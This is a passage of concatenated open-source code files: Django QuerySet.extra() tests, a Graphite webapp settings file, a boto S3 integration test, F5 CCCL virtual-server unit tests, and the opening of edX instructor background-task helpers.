[('first', 'second')]
)
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('second', flat=True)),
['second']
)
# Only the extra columns specified in the values_list() are returned
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('first', 'second', 'whiz')),
[('first', 'second', 'third')]
)
# ...also works if only extra columns are included
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('foo', 'whiz')),
[('first', 'third')]
)
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('whiz', flat=True)),
['third']
)
# ... and values are returned in the order they are specified
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('whiz', 'foo')),
[('third', 'first')]
)
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('first', 'id')),
[('first', obj.pk)]
)
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('whiz', 'first', 'bar', 'id')),
[('third', 'first', 'second', obj.pk)]
)
def test_regression_10847(self):
"""
Regression for #10847: the list of extra columns can always be
accurately evaluated. Using an inner query ensures that as_sql() is
producing correct output without requiring full evaluation and
execution of the inner query.
"""
obj = TestObject(first='first', second='second', third='third')
obj.save()
self.assertEqual(
list(TestObject.objects.extra(select={'extra': 1}).values('pk')),
[{'pk': obj.pk}]
)
self.assertQuerysetEqual(
TestObject.objects.filter(
pk__in=TestObject.objects.extra(select={'extra': 1}).values('pk')
),
['<TestObject: TestObject: first,second,third>']
)
self.assertEqual(
list(TestObject.objects.values('pk').extra(select={'extra': 1})),
[{'pk': obj.pk}]
)
self.assertQuerysetEqual(
TestObject.objects.filter(
pk__in=TestObject.objects.values('pk').extra(select={'extra': 1})
),
['<TestObject: TestObject: first,second,third>']
)
self.assertQuerysetEqual(
TestObject.objects.filter(pk=obj.pk) | TestObject.objects.extra(where=["id > %s"], params=[obj.pk]),
['<TestObject: TestObject: first,second,third>']
)
def test_regression_17877(self):
"""
Ensure that extra WHERE clauses get correctly ANDed, even when they
contain OR operations.
"""
# Test Case 1: should appear in queryset.
t = TestObject(first='a', second='a', third='a')
t.save()
# Test Case 2: should appear in queryset.
t = TestObject(first='b', second='a', third='a')
t.save()
# Test Case 3: should not appear in queryset, bug case.
t = TestObject(first='a', second='a', third='b')
t.save()
# Test Case 4: should not appear in queryset.
t = TestObject(first='b', second='a', third='b')
t.save()
# Test Case 5: should not appear in queryset.
t = TestObject(first='b', second='b', third='a')
t.save()
# Test Case 6: should not appear in queryset, bug case.
t = TestObject(first='a', second='b', third='b')
t.save()
self.assertQuerysetEqual(
TestObject.objects.extra(
where=["first = 'a' OR second = 'a'", "third = 'a'"],
),
['<TestObject: TestObject: a,a,a>', '<TestObject: TestObject: b,a,a>'],
ordered=False
)
def test_extra_values_distinct_ordering(self):
t1 = TestObject.objects.create(first='a', second='a', third='a')
t2 = TestObject.objects.create(first='a', second='b', third='b')
qs = TestObject.objects.extra(
select={'second_extra': 'second'}
).values_list('id', flat=True).distinct()
self.assertQuerysetEqual(
qs.order_by('second_extra'), [t1.pk, t2.pk], lambda x: x)
self.assertQuerysetEqual(
qs.order_by('-second_extra'), [t2.pk, t1.pk], lambda x: x)
# Note: the extra ordering must appear in select clause, so we get two
# non-distinct results here (this is on purpose, see #7070).
self.assertQuerysetEqual(
qs.order_by('-second_extra').values_list('first', flat=True),
['a', 'a'], lambda x: x)
|
bsd-3-clause
|
bitpew/vagrant-graphite-apache2
|
provisioning/etc/graphite/local_settings.py
|
2
|
8300
|
## Graphite local_settings.py
# Edit this file to customize the default Graphite webapp settings
#
# Additional customizations to Django settings can be added to this file as well
#####################################
# General Configuration #
#####################################
# Set this to a long, random unique string to use as a secret key for this
# install. This key is used for salting of hashes used in auth tokens,
# CSRF middleware, cookie storage, etc. This should be set identically among
# instances if used behind a load balancer.
#SECRET_KEY = 'UNSAFE_DEFAULT'
# In Django 1.5+ set this to the list of hosts your graphite instance is
# accessible as. See:
# https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-ALLOWED_HOSTS
#ALLOWED_HOSTS = [ '*' ]
# Set your local timezone (Django's default is America/Chicago)
# If your graphs appear to be offset by a couple hours then this probably
# needs to be explicitly set to your local timezone.
TIME_ZONE = 'Europe/Berlin'
# Override this to provide documentation specific to your Graphite deployment
#DOCUMENTATION_URL = "http://graphite.readthedocs.org/"
# Logging
# Before enabling these, see: https://answers.launchpad.net/graphite/+question/159731
LOG_RENDERING_PERFORMANCE = False
LOG_CACHE_PERFORMANCE = False
LOG_METRIC_ACCESS = True
# Enable full debug page display on exceptions (Internal Server Error pages)
DEBUG = False
# If using RRD files and rrdcached, set to the address or socket of the daemon
#FLUSHRRDCACHED = 'unix:/var/run/rrdcached.sock'
# This lists the memcached servers that will be used by this webapp.
# If you have a cluster of webapps you should ensure all of them
# have the *exact* same value for this setting. That will maximize cache
# efficiency. Setting MEMCACHE_HOSTS to be empty will turn off use of
# memcached entirely.
#
# You should not use the loopback address (127.0.0.1) here if using clustering
# as every webapp in the cluster should use the exact same values to prevent
# unneeded cache misses. Set to [] to disable caching of images and fetched data
#MEMCACHE_HOSTS = ['10.10.10.10:11211', '10.10.10.11:11211', '10.10.10.12:11211']
#DEFAULT_CACHE_DURATION = 60 # Cache images and data for 1 minute
#####################################
# Filesystem Paths #
#####################################
# Change only GRAPHITE_ROOT if your install is merely shifted from /opt/graphite
# to somewhere else
GRAPHITE_ROOT = '/usr/share/graphite-web'
# Most installs done outside of a separate tree such as /opt/graphite will only
# need to change these three settings. Note that the default settings for each
# of these is relative to GRAPHITE_ROOT
CONF_DIR = '/etc/graphite'
STORAGE_DIR = '/var/lib/graphite/whisper'
CONTENT_DIR = '/usr/share/graphite-web/static'
# To further or fully customize the paths, modify the following. Note that the
# default settings for each of these are relative to CONF_DIR and STORAGE_DIR
#
## Webapp config files
#DASHBOARD_CONF = '/opt/graphite/conf/dashboard.conf'
#GRAPHTEMPLATES_CONF = '/opt/graphite/conf/graphTemplates.conf'
## Data directories
# NOTE: If any directory is unreadable in DATA_DIRS it will break metric browsing
WHISPER_DIR = '/var/lib/graphite/whisper'
#RRD_DIR = '/opt/graphite/storage/rrd'
#DATA_DIRS = [WHISPER_DIR, RRD_DIR] # Default: set from the above variables
LOG_DIR = '/var/log/graphite'
INDEX_FILE = '/var/lib/graphite/search_index' # Search index file
#####################################
# Email Configuration #
#####################################
# This is used for emailing rendered Graphs
# Default backend is SMTP
#EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
#EMAIL_HOST = 'localhost'
#EMAIL_PORT = 25
#EMAIL_HOST_USER = ''
#EMAIL_HOST_PASSWORD = ''
#EMAIL_USE_TLS = False
# To drop emails on the floor, enable the Dummy backend:
#EMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'
#####################################
# Authentication Configuration #
#####################################
## LDAP / ActiveDirectory authentication setup
#USE_LDAP_AUTH = True
#LDAP_SERVER = "ldap.mycompany.com"
#LDAP_PORT = 389
# OR
#LDAP_URI = "ldaps://ldap.mycompany.com:636"
#LDAP_SEARCH_BASE = "OU=users,DC=mycompany,DC=com"
#LDAP_BASE_USER = "CN=some_readonly_account,DC=mycompany,DC=com"
#LDAP_BASE_PASS = "readonly_account_password"
#LDAP_USER_QUERY = "(username=%s)" #For Active Directory use "(sAMAccountName=%s)"
#
# If you want to further customize the ldap connection options you should
# directly use ldap.set_option to set the ldap module's global options.
# For example:
#
#import ldap
#ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_ALLOW)
#ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, "/etc/ssl/ca")
#ldap.set_option(ldap.OPT_X_TLS_CERTFILE, "/etc/ssl/mycert.pem")
#ldap.set_option(ldap.OPT_X_TLS_KEYFILE, "/etc/ssl/mykey.pem")
# See http://www.python-ldap.org/ for further details on these options.
## REMOTE_USER authentication. See: https://docs.djangoproject.com/en/dev/howto/auth-remote-user/
#USE_REMOTE_USER_AUTHENTICATION = True
# Override the URL for the login link (e.g. for django_openid_auth)
#LOGIN_URL = '/account/login'
##########################
# Database Configuration #
##########################
# By default sqlite is used. If you cluster multiple webapps you will need
# to setup an external database (such as MySQL) and configure all of the webapp
# instances to use the same database. Note that this database is only used to store
# Django models such as saved graphs, dashboards, user preferences, etc.
# Metric data is not stored here.
#
# DO NOT FORGET TO RUN 'manage.py syncdb' AFTER SETTING UP A NEW DATABASE
#
# The following built-in database engines are available:
# django.db.backends.postgresql # Removed in Django 1.4
# django.db.backends.postgresql_psycopg2
# django.db.backends.mysql
# django.db.backends.sqlite3
# django.db.backends.oracle
#
# The default is 'django.db.backends.sqlite3' with file 'graphite.db'
# located in STORAGE_DIR
#
DATABASES = {
'default': {
'NAME': '/var/lib/graphite/graphite.db',
'ENGINE': 'django.db.backends.sqlite3',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': ''
}
}
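# Hedged example (an assumption, not part of this deployment): clustered webapps
# sharing one external database might use a MySQL configuration along these lines.
#DATABASES = {
#    'default': {
#        'NAME': 'graphite',
#        'ENGINE': 'django.db.backends.mysql',
#        'USER': 'graphite',
#        'PASSWORD': 'changeme',
#        'HOST': '10.0.2.10',
#        'PORT': '3306'
#    }
#}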
#########################
# Cluster Configuration #
#########################
# (To avoid excessive DNS lookups you want to stick to using IP addresses only in this entire section)
#
# This should list the IP address (and optionally port) of the webapp on each
# remote server in the cluster. These servers must each have local access to
# metric data. Note that the first server to return a match for a query will be
# used.
#CLUSTER_SERVERS = ["10.0.2.2:80", "10.0.2.3:80"]
## These are timeout values (in seconds) for requests to remote webapps
#REMOTE_STORE_FETCH_TIMEOUT = 6 # Timeout to fetch series data
#REMOTE_STORE_FIND_TIMEOUT = 2.5 # Timeout for metric find requests
#REMOTE_STORE_RETRY_DELAY = 60 # Time before retrying a failed remote webapp
#REMOTE_FIND_CACHE_DURATION = 300 # Time to cache remote metric find results
## Remote rendering settings
# Set to True to enable rendering of Graphs on a remote webapp
#REMOTE_RENDERING = True
# List of IP (and optionally port) of the webapp on each remote server that
# will be used for rendering. Note that each rendering host should have local
# access to metric data or should have CLUSTER_SERVERS configured
#RENDERING_HOSTS = []
#REMOTE_RENDER_CONNECT_TIMEOUT = 1.0
# If you are running multiple carbon-caches on this machine (typically behind a relay using
# consistent hashing), you'll need to list the ip address, cache query port, and instance name of each carbon-cache
# instance on the local machine (NOT every carbon-cache in the entire cluster). The default cache query port is 7002
# and a common scheme is to use 7102 for instance b, 7202 for instance c, etc.
#
# You *should* use 127.0.0.1 here in most cases
#CARBONLINK_HOSTS = ["127.0.0.1:7002:a", "127.0.0.1:7102:b", "127.0.0.1:7202:c"]
#CARBONLINK_TIMEOUT = 1.0
#####################################
# Additional Django Settings #
#####################################
# Uncomment the following line for direct access to Django settings such as
# MIDDLEWARE_CLASSES or APPS
#from graphite.app_settings import *
|
apache-2.0
|
darjus-amzn/boto
|
tests/integration/storage_uri/test_storage_uri.py
|
132
|
2355
|
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Some unit tests for StorageUri
"""
from tests.unit import unittest
import time
import boto
from boto.s3.connection import S3Connection, Location
class StorageUriTest(unittest.TestCase):
s3 = True
def nuke_bucket(self, bucket):
for key in bucket:
key.delete()
bucket.delete()
def test_storage_uri_regionless(self):
# First, create a bucket in a different region.
conn = S3Connection(
host='s3-us-west-2.amazonaws.com'
)
bucket_name = 'keytest-%d' % int(time.time())
bucket = conn.create_bucket(bucket_name, location=Location.USWest2)
self.addCleanup(self.nuke_bucket, bucket)
# Now use ``storage_uri`` to try to make a new key.
# This would throw a 301 exception.
suri = boto.storage_uri('s3://%s/test' % bucket_name)
the_key = suri.new_key()
the_key.key = 'Test301'
the_key.set_contents_from_string(
'This should store in a different region.'
)
# Check it a different way.
alt_conn = boto.connect_s3(host='s3-us-west-2.amazonaws.com')
alt_bucket = alt_conn.get_bucket(bucket_name)
alt_key = alt_bucket.get_key('Test301')
|
mit
|
f5devcentral/f5-cccl
|
f5_cccl/resource/ltm/test/test_virtual.py
|
1
|
13147
|
#!/usr/bin/env python
# Copyright (c) 2017-2021 F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from copy import copy, deepcopy
from f5_cccl.resource.ltm.pool import Pool
from f5_cccl.resource.ltm.virtual import ApiVirtualServer
from f5_cccl.resource.ltm.virtual import IcrVirtualServer
from f5_cccl.resource.ltm.virtual import VirtualServer
from mock import Mock
import pytest
cfg_test = {
'name': 'Virtual-1',
'partition': 'my_partition',
'destination': '/Test/1.2.3.4%2:80',
'source': '10.0.0.1%2/32',
'pool': '/my_partition/pool1',
'ipProtocol': 'tcp',
'rules': ['Test/rule1', 'Test/rule2'],
'profiles': [
{'name': "tcp",
'partition': "Common",
'context': "all"}
],
'policies': [
{'name': "test_policy",
'partition': "my_partition"}
],
"enabled": True,
"vlansEnabled": True,
"vlans": ["/Test/vlan-100", "/Common/http-tunnel"],
"sourceAddressTranslation": {
"type": "snat",
"pool": "/Test/snatpool1"
},
'metadata': [{
'name': 'user_agent',
'persist': 'true',
'value': 'some-controller-v.1.4.0'
}]
}
@pytest.fixture
def bigip():
bigip = Mock()
return bigip
def test_create_virtual():
"""Test Virtual Server creation."""
virtual = VirtualServer(
default_route_domain=2,
**cfg_test
)
assert virtual
# verify all cfg items
for k,v in list(cfg_test.items()):
if k == "vlans" or k == "policies" or k == "rules":
assert virtual.data[k] == sorted(v)
else:
assert virtual.data[k] == v
def test_hash():
"""Test Virtual Server hash."""
virtual = VirtualServer(
default_route_domain=2,
**cfg_test
)
virtual1 = VirtualServer(
default_route_domain=2,
**cfg_test
)
cfg_changed = copy(cfg_test)
cfg_changed['name'] = 'test'
virtual2 = VirtualServer(
default_route_domain=2,
**cfg_changed
)
cfg_changed = copy(cfg_test)
cfg_changed['partition'] = 'other'
virtual3 = VirtualServer(
default_route_domain=2,
**cfg_changed
)
assert virtual
assert virtual1
assert virtual2
assert virtual3
assert hash(virtual) == hash(virtual1)
assert hash(virtual) != hash(virtual2)
assert hash(virtual) != hash(virtual3)
def test_eq():
"""Test Virtual Server equality."""
partition = 'Common'
name = 'virtual_1'
virtual = VirtualServer(
default_route_domain=2,
**deepcopy(cfg_test)
)
virtual2 = VirtualServer(
default_route_domain=2,
**deepcopy(cfg_test)
)
virtual3 = VirtualServer(
default_route_domain=2,
**deepcopy(cfg_test)
)
pool = Pool(
name=name,
partition=partition
)
assert virtual
assert virtual2
assert virtual3
assert virtual == virtual2
# remove profile context from Virtual2, should still be equal (because
# context is optional)
del virtual.data['profiles'][0]['context']
assert virtual == virtual2
# remove profile, now unequal
del virtual.data['profiles'][0]
assert virtual != virtual2
assert virtual3 == virtual2
# not equal
virtual2.data['destination'] = '/Test/1.2.3.4:8080'
assert virtual3 != virtual2
# different objects
assert virtual != pool
def test_uri_path(bigip):
"""Test Virtual Server URI."""
virtual = VirtualServer(
default_route_domain=2,
**cfg_test
)
assert virtual
assert virtual._uri_path(bigip) == bigip.tm.ltm.virtuals.virtual
def test_ipv4_destination():
"""Test Virtual Server destination."""
virtual = VirtualServer(
default_route_domain=2,
**cfg_test
)
assert virtual
destination = virtual.destination
assert destination
assert destination[0] == "/Test/1.2.3.4%2:80"
assert destination[1] == "Test"
assert destination[2] == "1.2.3.4%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test/1.2.3.4%2:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test/1.2.3.4%2:80"
assert destination[1] == "Test"
assert destination[2] == "1.2.3.4%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test/my_virtual_addr%2:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test/my_virtual_addr%2:80"
assert destination[1] == "Test"
assert destination[2] == "my_virtual_addr%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test_1/my_virtual_addr%2:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test_1/my_virtual_addr%2:80"
assert destination[1] == "Test_1"
assert destination[2] == "my_virtual_addr%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test-1/my_virtual_addr%2:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test-1/my_virtual_addr%2:80"
assert destination[1] == "Test-1"
assert destination[2] == "my_virtual_addr%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test.1/my_virtual_addr%2:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test.1/my_virtual_addr%2:80"
assert destination[1] == "Test.1"
assert destination[2] == "my_virtual_addr%2"
assert destination[3] == "80"
def test_ipv6_destination():
cfg = copy(cfg_test)
cfg['destination'] = "/Test_1/2001::1%2.80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test_1/2001::1%2.80"
assert destination[1] == "Test_1"
assert destination[2] == "2001::1%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test/2001:0db8:85a3:0000:0000:8a2e:0370:7334.80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test/2001:0db8:85a3:0000:0000:8a2e:0370:7334%2.80"
assert destination[1] == "Test"
assert destination[2] == "2001:0db8:85a3:0000:0000:8a2e:0370:7334%2"
assert destination[3] == "80"
cfg = copy(cfg_test)
cfg['destination'] = "/Test/2001:0db8:85a3::8a2e:0370:7334.80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test/2001:0db8:85a3::8a2e:0370:7334%2.80"
assert destination[1] == "Test"
assert destination[2] == "2001:0db8:85a3::8a2e:0370:7334%2"
assert destination[3] == "80"
# Negative matches
cfg = copy(cfg_test)
cfg['destination'] = "Test/2001:0db8:85a3::8a2e:0370:7334.80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "Test/2001:0db8:85a3::8a2e:0370:7334.80"
assert not destination[1]
assert not destination[2]
assert not destination[3]
# Negative matches
cfg = copy(cfg_test)
cfg['destination'] = "/Test/2001:0db8:85a3::8a2e:0370:7334%3:80"
virtual = VirtualServer(
default_route_domain=2,
**cfg
)
destination = virtual.destination
assert destination[0] == "/Test/2001:0db8:85a3::8a2e:0370:7334%3:80"
assert not destination[1]
assert not destination[2]
assert not destination[3]
cfg_test_api_virtual = {
'name': 'Virtual-1',
'partition': 'my_partition',
'destination': '/Test/1.2.3.4:80',
'source': '10.0.0.1/32',
'pool': '/my_partition/pool1',
'ipProtocol': 'tcp',
'rules': ['Test/rule1', 'Test/rule2'],
'profiles': [
{'name': "tcp",
'partition': "Common",
'context': "all"}
],
'policies': [
{'name': "test_policy",
'partition': "my_partition"}
],
"vlansEnabled": True,
"vlans": ["/Test/vlan-100", "/Common/http-tunnel"],
"sourceAddressTranslation": {
"type": "snat",
"pool": "/Test/snatpool1"
},
'metadata': [{
'name': 'user_agent',
'persist': 'true',
'value': 'some-controller-v.1.4.0'
}]
}
def test_create_api_virtual():
"""Test Virtual Server creation."""
virtual = ApiVirtualServer(
default_route_domain=2,
**cfg_test_api_virtual
)
assert virtual
# verify all cfg items
for k,v in list(cfg_test.items()):
if k == "vlans" or k == 'policies' or k == "rules":
assert virtual.data[k] == sorted(v)
else:
assert virtual.data[k] == v
assert virtual.data['enabled']
assert 'disabled' not in virtual.data
cfg_test_api_virtual['enabled'] = False
virtual = ApiVirtualServer(
default_route_domain=2,
**cfg_test_api_virtual
)
assert virtual
assert 'enabled' not in virtual.data
assert virtual.data['disabled']
cfg_test_api_virtual['enabled'] = True
cfg_test_api_virtual.pop('vlansEnabled', None)
virtual = ApiVirtualServer(
default_route_domain=2,
**cfg_test_api_virtual
)
assert virtual
assert 'vlansEnabled' not in virtual.data
assert virtual.data['vlansDisabled']
cfg_test_icr_virtual = {
"addressStatus": "yes",
"autoLasthop": "default",
"cmpEnabled": "yes",
"connectionLimit": 0,
"destination": "/Common/10.190.1.2:443",
"enabled": True,
"fullPath": "/Common/virtual1",
"generation": 15839,
"gtmScore": 0,
"ipProtocol": "tcp",
"kind": "tm:ltm:virtual:virtualstate",
"mask": "255.255.255.255",
"mirror": "disabled",
"mobileAppTunnel": "disabled",
"name": "virtual1",
"nat64": "disabled",
"partition": "Common",
"policiesReference": {
"isSubcollection": True,
"link": "https://localhost/mgmt/tm/ltm/virtual/~Common~virtual1/policies?ver=12.1.0",
"items": [
{
"kind": "tm:ltm:virtual:policies:policiesstate",
"name": "wrapper_policy",
"partition": "Test",
"fullPath": "/Test/wrapper_policy",
"generation": 7538,
"selfLink": "https://localhost/mgmt/tm/ltm/virtual/~Test~vs1/policies/~Test~wrapper_policy?ver=12.1.1",
"nameReference": {
"link": "https://localhost/mgmt/tm/ltm/policy/~Test~wrapper_policy?ver=12.1.1"
}
}
]
},
"pool": "/Common/test_pool",
"poolReference": {
"link": "https://localhost/mgmt/tm/ltm/pool/~Common~test_pool?ver=12.1.0"
},
"profilesReference": {
"isSubcollection": True,
"link": "https://localhost/mgmt/tm/ltm/virtual/~Common~virtual1/profiles?ver=12.1.0",
"items": [
{
"kind": "tm:ltm:virtual:profiles:profilesstate",
"name": "clientssl",
"partition": "Common",
"fullPath": "/Common/clientssl",
"generation": 7538,
"selfLink": "https://localhost/mgmt/tm/ltm/virtual/~Test~vs1/profiles/~Common~clientssl?ver=12.1.1",
"context": "clientside",
"nameReference": {
"link": "https://localhost/mgmt/tm/ltm/profile/client-ssl/~Common~clientssl?ver=12.1.1"
}
}
]
},
"rateLimit": "disabled",
"rateLimitDstMask": 0,
"rateLimitMode": "object",
"rateLimitSrcMask": 0,
"selfLink": "https://localhost/mgmt/tm/ltm/virtual/~Common~virtual1?ver=12.1.0",
"serviceDownImmediateAction": "none",
"source": "0.0.0.0/0",
"sourceAddressTranslation": {
"type": "none"
},
"sourcePort": "preserve",
"synCookieStatus": "not-activated",
"translateAddress": "enabled",
"translatePort": "enabled",
"vlansDisabled": True,
"vsIndex": 111
}
def test_create_icr_virtual():
"""Test Virtual Server creation."""
virtual = IcrVirtualServer(
default_route_domain=2,
**cfg_test_icr_virtual
)
assert virtual
|
apache-2.0
|
Learningtribes/edx-platform
|
lms/djangoapps/instructor_task/tasks_helper.py
|
6
|
74119
|
"""
This file contains tasks that are designed to perform background operations on the
running state of a course.
"""
import json
import re
from collections import OrderedDict
from datetime import datetime
from django.conf import settings
from eventtracking import tracker
from itertools import chain
from time import time
import unicodecsv
import logging
from celery import Task, current_task
from celery.states import SUCCESS, FAILURE
from django.contrib.auth.models import User
from django.core.files.storage import DefaultStorage
from django.db import reset_queries
from django.db.models import Q
import dogstats_wrapper as dog_stats_api
from pytz import UTC
from StringIO import StringIO
from edxmako.shortcuts import render_to_string
from instructor.paidcourse_enrollment_report import PaidCourseEnrollmentReportProvider
from shoppingcart.models import (
PaidCourseRegistration, CourseRegCodeItem, InvoiceTransaction,
Invoice, CouponRedemption, RegistrationCodeRedemption, CourseRegistrationCode
)
from survey.models import SurveyAnswer
from track.views import task_track
from util.db import outer_atomic
from util.file import course_filename_prefix_generator, UniversalNewlineIterator
from xblock.runtime import KvsFieldData
from xmodule.modulestore.django import modulestore
from xmodule.split_test_module import get_split_user_partitions
from django.utils.translation import ugettext as _
from certificates.models import (
CertificateWhitelist,
certificate_info_for_user,
CertificateStatuses,
GeneratedCertificate
)
from certificates.api import generate_user_certificates
from courseware.courses import get_course_by_id, get_problems_in_section
from courseware.grades import iterate_grades_for
from courseware.models import StudentModule
from courseware.model_data import DjangoKeyValueStore, FieldDataCache
from courseware.module_render import get_module_for_descriptor_internal
from instructor_analytics.basic import (
enrolled_students_features,
get_proctored_exam_results,
list_may_enroll,
list_problem_responses
)
from instructor_analytics.csvs import format_dictlist
from openassessment.data import OraAggregateData
from instructor_task.models import ReportStore, InstructorTask, PROGRESS
from lms.djangoapps.lms_xblock.runtime import LmsPartitionService
from openedx.core.djangoapps.course_groups.cohorts import get_cohort
from openedx.core.djangoapps.course_groups.models import CourseUserGroup
from openedx.core.djangoapps.content.course_structures.models import CourseStructure
from opaque_keys.edx.keys import UsageKey
from openedx.core.djangoapps.course_groups.cohorts import add_user_to_cohort, is_course_cohorted
from student.models import CourseEnrollment, CourseAccessRole
from lms.djangoapps.teams.models import CourseTeamMembership
from lms.djangoapps.verify_student.models import SoftwareSecurePhotoVerification
# define different loggers for use within tasks and on client side
TASK_LOG = logging.getLogger('edx.celery.task')
# define value to use when no task_id is provided:
UNKNOWN_TASK_ID = 'unknown-task_id'
FILTERED_OUT_ROLES = ['staff', 'instructor', 'finance_admin', 'sales_admin']
# define values for update functions to use to return status to perform_module_state_update
UPDATE_STATUS_SUCCEEDED = 'succeeded'
UPDATE_STATUS_FAILED = 'failed'
UPDATE_STATUS_SKIPPED = 'skipped'
# The setting name used for events when "settings" (account settings, preferences, profile information) change.
REPORT_REQUESTED_EVENT_NAME = u'edx.instructor.report.requested'
class BaseInstructorTask(Task):
"""
Base task class for use with InstructorTask models.
Permits updating information about task in corresponding InstructorTask for monitoring purposes.
Assumes that the entry_id of the InstructorTask model is the first argument to the task.
The `entry_id` is the primary key for the InstructorTask entry representing the task. This class
updates the entry on success and failure of the task it wraps. It is setting the entry's value
for task_state based on what Celery would set it to once the task returns to Celery:
FAILURE if an exception is encountered, and SUCCESS if it returns normally.
Other arguments are pass-throughs to perform_module_state_update, and documented there.
"""
abstract = True
def on_success(self, task_progress, task_id, args, kwargs):
"""
Update InstructorTask object corresponding to this task with info about success.
Updates task_output and task_state. But it shouldn't actually do anything
if the task is only creating subtasks to actually do the work.
Assumes `task_progress` is a dict containing the task's result, with the following keys:
'attempted': number of attempts made
'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible subtasks to attempt
'action_name': user-visible verb to use in status messages. Should be past-tense.
Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
This is JSON-serialized and stored in the task_output column of the InstructorTask entry.
"""
TASK_LOG.debug('Task %s: success returned with progress: %s', task_id, task_progress)
# We should be able to find the InstructorTask object to update
# based on the task_id here, without having to dig into the
# original args to the task. On the other hand, the entry_id
# is the first value passed to all such args, so we'll use that.
# And we assume that it exists, else we would already have had a failure.
entry_id = args[0]
entry = InstructorTask.objects.get(pk=entry_id)
# Check to see if any subtasks had been defined as part of this task.
# If not, then we know that we're done. (If so, let the subtasks
# handle updating task_state themselves.)
if len(entry.subtasks) == 0:
entry.task_output = InstructorTask.create_output_for_success(task_progress)
entry.task_state = SUCCESS
entry.save_now()
def on_failure(self, exc, task_id, args, kwargs, einfo):
"""
Update InstructorTask object corresponding to this task with info about failure.
Fetches and updates exception and traceback information on failure.
If an exception is raised internal to the task, it is caught by celery and provided here.
The information is recorded in the InstructorTask object as a JSON-serialized dict
stored in the task_output column. It contains the following keys:
'exception': type of exception object
'message': error message from exception object
'traceback': traceback information (truncated if necessary)
Note that there is no way to record progress made within the task (e.g. attempted,
succeeded, etc.) when such failures occur.
"""
TASK_LOG.debug(u'Task %s: failure returned', task_id)
entry_id = args[0]
try:
entry = InstructorTask.objects.get(pk=entry_id)
except InstructorTask.DoesNotExist:
# if the InstructorTask object does not exist, then there's no point
# trying to update it.
TASK_LOG.error(u"Task (%s) has no InstructorTask object for id %s", task_id, entry_id)
else:
TASK_LOG.warning(u"Task (%s) failed", task_id, exc_info=True)
entry.task_output = InstructorTask.create_output_for_failure(einfo.exception, einfo.traceback)
entry.task_state = FAILURE
entry.save_now()
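# Hedged usage sketch (illustrative; the decorator wiring lives in the tasks
# module, and the names below are assumptions): a concrete instructor task binds
# this base class through celery, e.g.
#
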